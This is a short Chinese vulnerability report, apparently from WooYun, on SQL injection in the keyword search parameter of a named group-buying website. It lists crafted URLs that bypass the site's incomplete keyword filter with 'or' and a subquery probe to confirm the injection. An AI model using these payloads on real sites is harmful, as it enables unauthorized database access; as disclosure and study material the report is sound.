WooYun.org

其实这个貌似对参数进行了过滤，and,-等关键字都已经被限制，但是，过滤不严格导致了问题：or,select ,',=,<,>等管关键字未被过滤
先找个不从在的关键字
http://www.tiantiantuangou.com/team/index.php?filter=true&keyword=qqqq返回空
http://www.tiantiantuangou.com/team/index.php?filter=true&keyword=qqqq'+or%20'1'='依然返回空
http://www.tiantiantuangou.com/team/index.php?filter=true&keyword=qqqq'+or%20'%'='返回数据
由此推断后台sql语句可能类似这样的写法 select * from xxx where keyword like '%str%'
，然后我们再来试试http://www.tiantiantuangou.com/team/index.php?filter=true&keyword=qqqq'+or%200%3E0+or%20'1'='返回空 or 0>0以及最后的or '1'='%也为false，所以返回空
http://www.tiantiantuangou.com/team/index.php?filter=true&keyword=qqqq'+or%201%3E0+or%20'1'='返回数据 因为or 1>0成立
http://www.tiantiantuangou.com/team/index.php?filter=true&keyword=qqqq'+or%20(select%201)%3E0+or%20'1'=' 返回数据，说明 (select 1)>0成立，select查询成功